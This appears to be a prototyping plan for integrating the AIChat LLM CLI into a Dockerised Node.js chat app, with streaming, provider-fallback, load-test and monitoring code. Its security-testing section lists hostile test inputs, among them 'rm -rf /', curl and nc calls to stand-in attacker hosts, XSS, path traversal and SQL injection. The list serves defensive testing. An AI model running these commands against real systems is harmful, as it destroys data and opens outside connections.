Last updated: Sep 1, 2025, 01:10 PM UTC

LLM CLI Integration Prototyping Plan

Generated: 2025-08-05 UTC
Purpose: Systematic approach to prototype and validate LLM CLI integration for Sasha Studio
Target: Docker-based Node.js application with real-time AI chat streaming


Prototype Objectives

  1. Validate streaming performance - Token-by-token response rendering
  2. Test multi-provider routing - Fallback mechanisms and cost optimization
  3. Verify Docker integration - Container setup and security patterns
  4. Measure error handling - Connection resilience and recovery
  5. Assess scalability - Concurrent request handling

Prototype Architecture

Phase 1: Core Integration Test (Week 1)

Prototype 1A: Basic CLI Streaming

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    spawn()    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”    stdout    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Node.js API    │──────────────►│  AIChat CLI  │─────────────►│  WebSocket      β”‚
β”‚  Server         β”‚               β”‚  Process     β”‚              β”‚  Client         β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜               β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜              β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Validation Criteria:

  • Token-by-token streaming without blocking
  • Process cleanup on connection close
  • Error handling for CLI failures
  • Memory usage under load

Expected Timeline: 2-3 days

Prototype 1B: Multi-Provider Testing

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”              β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Provider Router│──┐           β”‚  OpenAI API  β”‚
β”‚  Logic          β”‚  β”‚           β”‚  (via CLI)   β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β”‚           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                     β”‚
                     β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                     β”‚           β”‚  Claude API  β”‚
                     β”‚           β”‚  (via CLI)   β”‚
                     β”‚           β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                     β”‚
                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                 β”‚  Gemini API  β”‚
                                 β”‚  (via CLI)   β”‚
                                 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Validation Criteria:

  • Automatic fallback when provider fails
  • Cost calculation accuracy
  • Provider-specific error handling
  • Configuration management

Expected Timeline: 2-3 days


Docker Integration Strategy

Phase 2: Container Architecture (Week 1-2)

Dockerfile Prototype

FROM node:20-alpine AS base

# Install AIChat CLI (most comprehensive alternative to LLxprt)
RUN wget https://github.com/sigoden/aichat/releases/latest/download/aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && tar -xzf aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && mv aichat /usr/local/bin/ \
    && chmod +x /usr/local/bin/aichat \
    && rm aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz

# Create non-root user for security
RUN addgroup -g 1001 -S nodejs && \
    adduser -S nodejs -u 1001

# Setup configuration directory
RUN mkdir -p /app/.config/aichat && \
    chown -R nodejs:nodejs /app

FROM base AS development
WORKDIR /app
USER nodejs

# Copy package files
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --only=development

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["npm", "run", "dev"]

FROM base AS production
WORKDIR /app
USER nodejs

# Copy package files and install production dependencies
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --omit=dev

# Copy source code
COPY --chown=nodejs:nodejs . .

EXPOSE 3000
CMD ["node", "server.js"]

Configuration Management

# .config/aichat/config.yaml
model: openai:gpt-4
temperature: 0.7
stream: true
save: false  # Don't save conversations to avoid disk bloat

clients:
  - type: openai
    api_key: ${OPENAI_API_KEY}
    api_base: https://api.openai.com/v1
  - type: claude
    api_key: ${ANTHROPIC_API_KEY}  
    api_base: https://api.anthropic.com
  - type: gemini
    api_key: ${GOOGLE_API_KEY}
    api_base: https://generativelanguage.googleapis.com

Validation Criteria:

  • Secure API key management via environment variables
  • Non-root container execution
  • Proper file permissions and ownership
  • Resource limits and health checks

Streaming Implementation Patterns

Phase 3: Real-Time Communication (Week 2)

WebSocket + CLI Integration

// prototype/streaming-integration.js
const { spawn } = require('child_process');
const WebSocket = require('ws');
const express = require('express');

class StreamingLLMService {
    constructor() {
        this.activeStreams = new Map();
    }

    async startStream(sessionId, message, model = 'openai:gpt-4') {
        const startTime = Date.now();
        
        // Spawn CLI process with streaming
        const process = spawn('aichat', [
            '-m', model,
            '--stream',
            '--no-save',
            message
        ], {
            env: { 
                ...process.env, 
                AICHAT_CONFIG_DIR: '/app/.config/aichat' 
            }
        });

        this.activeStreams.set(sessionId, {
            process,
            startTime,
            chunks: 0,
            totalChars: 0
        });

        return process;
    }

    setupWebSocketHandling(wss) {
        wss.on('connection', (ws, req) => {
            const sessionId = req.url.split('session=')[1];
            
            ws.on('message', async (data) => {
                try {
                    const { message, model } = JSON.parse(data);
                    const process = await this.startStream(sessionId, message, model);
                    
                    // Stream stdout to WebSocket
                    process.stdout.on('data', (chunk) => {
                        const streamData = this.activeStreams.get(sessionId);
                        if (streamData) {
                            streamData.chunks++;
                            streamData.totalChars += chunk.length;
                        }
                        
                        ws.send(JSON.stringify({
                            type: 'chunk',
                            content: chunk.toString(),
                            sessionId
                        }));
                    });

                    // Handle completion
                    process.on('close', (code) => {
                        const streamData = this.activeStreams.get(sessionId);
                        const duration = Date.now() - streamData?.startTime || 0;
                        
                        ws.send(JSON.stringify({
                            type: 'complete',
                            sessionId,
                            metadata: {
                                duration,
                                chunks: streamData?.chunks || 0,
                                totalChars: streamData?.totalChars || 0,
                                exitCode: code
                            }
                        }));
                        
                        this.activeStreams.delete(sessionId);
                    });

                    // Error handling
                    process.stderr.on('data', (error) => {
                        ws.send(JSON.stringify({
                            type: 'error',
                            error: error.toString(),
                            sessionId
                        }));
                    });

                } catch (error) {
                    ws.send(JSON.stringify({
                        type: 'error',
                        error: error.message,
                        sessionId
                    }));
                }
            });

            ws.on('close', () => {
                // Cleanup any active processes for this session
                const streamData = this.activeStreams.get(sessionId);
                if (streamData?.process) {
                    streamData.process.kill('SIGTERM');
                    this.activeStreams.delete(sessionId);
                }
            });
        });
    }
}

Provider Fallback Logic

// prototype/provider-router.js
class ProviderRouter {
    constructor() {
        this.providers = {
            'openai': { models: ['gpt-4', 'gpt-3.5-turbo'], priority: 1 },
            'claude': { models: ['claude-3-sonnet', 'claude-3-haiku'], priority: 2 },
            'gemini': { models: ['gemini-pro'], priority: 3 }
        };
        
        this.healthStatus = new Map();
        this.lastHealthCheck = new Map();
    }

    async routeRequest(message, preferredProvider = null) {
        const availableProviders = await this.getHealthyProviders();
        
        if (preferredProvider && availableProviders.includes(preferredProvider)) {
            return this.executeWithProvider(preferredProvider, message);
        }

        // Try providers in priority order
        for (const provider of availableProviders) {
            try {
                return await this.executeWithProvider(provider, message);
            } catch (error) {
                console.warn(`Provider ${provider} failed, trying next:`, error.message);
                this.markProviderUnhealthy(provider);
                continue;
            }
        }

        throw new Error('All providers failed');
    }

    async executeWithProvider(provider, message) {
        const model = `${provider}:${this.providers[provider].models[0]}`;
        
        return new Promise((resolve, reject) => {
            const process = spawn('aichat', ['-m', model, '--stream', message]);
            let response = '';
            
            process.stdout.on('data', (chunk) => {
                response += chunk.toString();
            });
            
            process.on('close', (code) => {
                if (code === 0) {
                    this.markProviderHealthy(provider);
                    resolve({ provider, model, response });
                } else {
                    reject(new Error(`Provider ${provider} exited with code ${code}`));
                }
            });
            
            process.stderr.on('data', (error) => {
                reject(new Error(`Provider ${provider} error: ${error.toString()}`));
            });
        });
    }

    async getHealthyProviders() {
        const healthy = [];
        
        for (const [provider, config] of Object.entries(this.providers)) {
            if (await this.isProviderHealthy(provider)) {
                healthy.push(provider);
            }
        }
        
        return healthy.sort((a, b) => 
            this.providers[a].priority - this.providers[b].priority
        );
    }

    async isProviderHealthy(provider) {
        const lastCheck = this.lastHealthCheck.get(provider) || 0;
        const now = Date.now();
        
        // Cache health status for 5 minutes
        if (now - lastCheck < 5 * 60 * 1000) {
            return this.healthStatus.get(provider) !== false;
        }
        
        try {
            // Quick health check with minimal request
            await this.executeWithProvider(provider, 'test');
            this.healthStatus.set(provider, true);
            this.lastHealthCheck.set(provider, now);
            return true;
        } catch (error) {
            this.healthStatus.set(provider, false);
            this.lastHealthCheck.set(provider, now);
            return false;
        }
    }

    markProviderHealthy(provider) {
        this.healthStatus.set(provider, true);
        this.lastHealthCheck.set(provider, Date.now());
    }

    markProviderUnhealthy(provider) {
        this.healthStatus.set(provider, false);
        this.lastHealthCheck.set(provider, Date.now());
    }
}

Validation Criteria:

  • Sub-second first token response time
  • Smooth streaming without UI blocking
  • Graceful WebSocket reconnection
  • Automatic provider failover
  • Memory usage remains stable under load

Performance Testing Strategy

Phase 4: Load Testing (Week 2-3)

Concurrent Stream Testing

// prototype/load-test.js
const WebSocket = require('ws');

async function loadTest() {
    const concurrentConnections = 10;
    const messagesPerConnection = 5;
    const connections = [];
    
    console.log('Starting load test...');
    console.log(`Concurrent connections: ${concurrentConnections}`);
    console.log(`Messages per connection: ${messagesPerConnection}`);
    
    for (let i = 0; i < concurrentConnections; i++) {
        const ws = new WebSocket(`ws://localhost:3000/ws?session=test-${i}`);
        connections.push({
            ws,
            sessionId: `test-${i}`,
            messagesSent: 0,
            responses: [],
            startTime: Date.now()
        });
        
        ws.on('open', () => {
            console.log(`Connection ${i} opened`);
            sendNextMessage(connections[i]);
        });
        
        ws.on('message', (data) => {
            const message = JSON.parse(data);
            const conn = connections[i];
            
            if (message.type === 'complete') {
                conn.responses.push({
                    duration: Date.now() - conn.startTime,
                    chunks: message.metadata.chunks
                });
                
                if (conn.messagesSent < messagesPerConnection) {
                    setTimeout(() => sendNextMessage(conn), 1000);
                } else {
                    ws.close();
                }
            }
        });
    }
    
    function sendNextMessage(conn) {
        conn.messagesSent++;
        conn.startTime = Date.now();
        
        conn.ws.send(JSON.stringify({
            message: `Test message ${conn.messagesSent} for load testing`,
            model: 'openai:gpt-3.5-turbo'
        }));
    }
}

loadTest().catch(console.error);

Memory and Resource Monitoring

// prototype/monitor.js
class SystemMonitor {
    constructor() {
        this.metrics = {
            memoryUsage: [],
            activeProcesses: 0,
            responseTimeHistory: [],
            errorRate: 0
        };
        
        this.startMonitoring();
    }
    
    startMonitoring() {
        setInterval(() => {
            const usage = process.memoryUsage();
            this.metrics.memoryUsage.push({
                timestamp: Date.now(),
                heapUsed: usage.heapUsed / 1024 / 1024, // MB
                heapTotal: usage.heapTotal / 1024 / 1024, // MB
                external: usage.external / 1024 / 1024 // MB
            });
            
            // Keep only last 100 measurements
            if (this.metrics.memoryUsage.length > 100) {
                this.metrics.memoryUsage.shift();
            }
        }, 5000);
    }
    
    recordResponseTime(duration) {
        this.metrics.responseTimeHistory.push(duration);
        if (this.metrics.responseTimeHistory.length > 1000) {
            this.metrics.responseTimeHistory.shift();
        }
    }
    
    getAverageResponseTime() {
        if (this.metrics.responseTimeHistory.length === 0) return 0;
        
        const sum = this.metrics.responseTimeHistory.reduce((a, b) => a + b, 0);
        return sum / this.metrics.responseTimeHistory.length;
    }
    
    getMemoryTrend() {
        if (this.metrics.memoryUsage.length < 2) return 'stable';
        
        const recent = this.metrics.memoryUsage.slice(-10);
        const trend = recent[recent.length - 1].heapUsed - recent[0].heapUsed;
        
        if (trend > 10) return 'increasing';
        if (trend < -10) return 'decreasing';
        return 'stable';
    }
}

Performance Targets:

  • First Token: < 500ms
  • Memory Growth: < 5MB/hour under normal load
  • Concurrent Streams: 10+ simultaneous users
  • Error Rate: < 1% under normal conditions
  • CPU Usage: < 50% during streaming

Security Validation

Phase 5: Security Testing (Week 3)

Input Sanitization Testing

// prototype/security-tests.js
const securityTests = [
    // Command injection attempts
    'test; rm -rf /',
    'test && curl evil.com',
    'test | nc attacker.com 1234',
    'test $(wget evil.com)',
    
    // XSS attempts  
    '<script>alert("xss")</script>',
    'javascript:alert(1)',
    
    // Path traversal
    '../../../etc/passwd',
    '..\\..\\windows\\system32',
    
    // SQL injection patterns
    "'; DROP TABLE users; --",
    '1 OR 1=1',
    
    // Extremely long inputs
    'A'.repeat(100000),
    
    // Special characters
    String.fromCharCode(0, 1, 2, 3, 4, 5)
];

async function runSecurityTests() {
    for (const testInput of securityTests) {
        try {
            console.log(`Testing: ${testInput.substring(0, 50)}...`);
            
            const ws = new WebSocket('ws://localhost:3000/ws?session=security-test');
            
            ws.on('open', () => {
                ws.send(JSON.stringify({
                    message: testInput,
                    model: 'openai:gpt-3.5-turbo'
                }));
            });
            
            ws.on('message', (data) => {
                const response = JSON.parse(data);
                if (response.type === 'error') {
                    console.log('βœ… Properly rejected malicious input');
                } else {
                    console.log('⚠️  Input was processed - review for security issues');
                }
                ws.close();
            });
            
        } catch (error) {
            console.log('βœ… Input properly rejected:', error.message);
        }
        
        await new Promise(resolve => setTimeout(resolve, 100));
    }
}

Security Validation Criteria:

  • Command injection prevention
  • Input length limits enforced
  • Special character handling
  • Process isolation maintained
  • API key exposure prevention

Success Metrics & KPIs

Technical Performance

  • Streaming Latency: First token < 500ms, subsequent tokens < 50ms
  • Memory Efficiency: < 100MB base usage, < 5MB growth per hour
  • Error Recovery: < 5 second reconnection time
  • Process Management: Zero zombie processes after 24h operation

Provider Integration

  • Fallback Success Rate: > 99% successful fallback when primary fails
  • Cost Accuracy: Β±5% accuracy in cost calculations
  • Provider Coverage: Support for 3+ major providers (OpenAI, Anthropic, Google)

Security & Reliability

  • Input Validation: 100% malicious input rejection
  • Container Security: Non-root execution, minimal privileges
  • Audit Logging: Complete request/response logging for compliance

Decision Framework

Prototype Success Criteria

PROCEED with full implementation if:

  • All streaming tests pass performance targets
  • Provider fallback works reliably
  • Security validation shows no vulnerabilities
  • Memory usage remains stable under load
  • Docker integration is seamless

PIVOT to alternative approach if:

  • Streaming latency > 1 second consistently
  • Memory leaks detected in 24h testing
  • Command injection or security issues found
  • Provider fallback fails > 5% of time
  • Docker setup is complex or unreliable

ITERATE prototypes if:

  • Performance is close but needs optimization
  • One provider consistently fails
  • Minor security issues that can be fixed
  • Docker setup needs refinement

Implementation Timeline

Week 1: Core Prototyping

  • Days 1-2: Basic CLI streaming integration
  • Days 3-4: Multi-provider testing and fallback
  • Days 5-7: Docker container integration and testing

Week 2: Advanced Features

  • Days 1-3: WebSocket real-time streaming
  • Days 4-5: Load testing and performance optimization
  • Days 6-7: Security testing and validation

Week 3: Documentation & Decision

  • Days 1-2: Create comprehensive integration guide
  • Days 3-4: Document all patterns and lessons learned
  • Days 5-7: Final recommendation and next steps

Feedback Loop

After each prototype phase:

  1. Measure against success criteria
  2. Document lessons learned
  3. Identify optimization opportunities
  4. Update implementation approach
  5. Create reusable patterns

This systematic approach ensures we build robust, scalable LLM integration with confidence in our technical decisions.


This prototyping plan provides a comprehensive path from concept to production-ready implementation, with clear validation criteria and decision points along the way.